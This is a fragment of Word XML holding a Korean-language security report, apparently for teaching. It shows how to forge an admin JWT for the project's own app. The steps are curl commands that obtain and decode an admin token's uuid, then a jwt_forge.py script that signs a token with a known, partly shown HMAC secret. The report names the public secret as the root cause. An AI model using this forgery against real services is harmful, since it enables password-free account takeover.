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spacing w:after="80" w:line="272" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">※ 중요 — 이 브랜치는 방어가 누적된다. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">HEAD 에는 5-2(토큰 subject를 uuid로)가 이미 적용돼 있어, jwt_forge.py admin@aa.com(email subject)는 현재 코드에서 401 로 막힌다. 이것은 버그가 아니라 5-2 방어가 작동하는 것이다(= 5-2 표의 '예전 방식 위조 → 401'). 아래 4-1 은 현재 코드(HEAD) 기준으로 재현한다. 5-2 이전의 email 위조 성공(200)을 그대로 보려면 그 변경 전 커밋에서 실행한다.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유효한 토큰을 직접 서명한다. 단 HEAD 에서는 subject 가 uuid 이므로 유효한 uuid 가 필요하다(토큰을 한 번 가로채거나 로그·DB 에서 얻었다고 가정).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(1) admin 토큰을 한 번 확보해 그 안의 uuid(sub) 를 읽는다 (토큰 탈취 가정)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RT=$(curl -s -X POST "$B/api/userinfos/login" -H "Content-Type: application/json"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-d '{"email":"admin@aa.com","password":"pwd1"}' | python -c "..['accessToken']")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UUID=$(echo "$RT" | cut -d. -f2 | python -c "..base64 디코딩 후 ['sub']..")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(2) 알려진 secret + 그 uuid 로 위조 → 비밀번호 없이 admin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FU=$(python docs/security/jwt_forge.py "$UUID")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$FU"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유효 uuid + 알려진 secret 위조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(탈취)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(참고) jwt_forge.py admin@aa.com (email) →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(5-2 uuid 방어)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="272" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">→ secret 하나로 유효한 토큰을 찍어낼 수 있다. uuid 하드닝(5-2)으로 '유효한 uuid' 조건이 붙었지만, 근본 원인은 공개된 secret 이다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="272" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">jwt_forge.py 는 무엇을 하나 (교육용 위조 스크립트)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="272" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">외부 라이브러리 없이 표준 라이브러리만으로 JWT 를 직접 서명(위조)한다. 핵심은 서버와 똑같은 방식으로 서명 키를 만드는 것이다.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SECRET = "5367566B...7437"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def forge(sub, ttl=3600, alg="HS256"):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>
      <w:pPr>
        <w:spacing w:after="80" w:line="272" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">동작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. 으로 잇는다 → signing_input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을 알려진 secret 으로 HMAC-SHA256 서명 → 세 번째 칸(signature)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출력 → 서버가 같은 secret 으로 검증하므로 유효한 토큰으로 인정</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="272" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">사용법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토큰(4-2 데모)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="272" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"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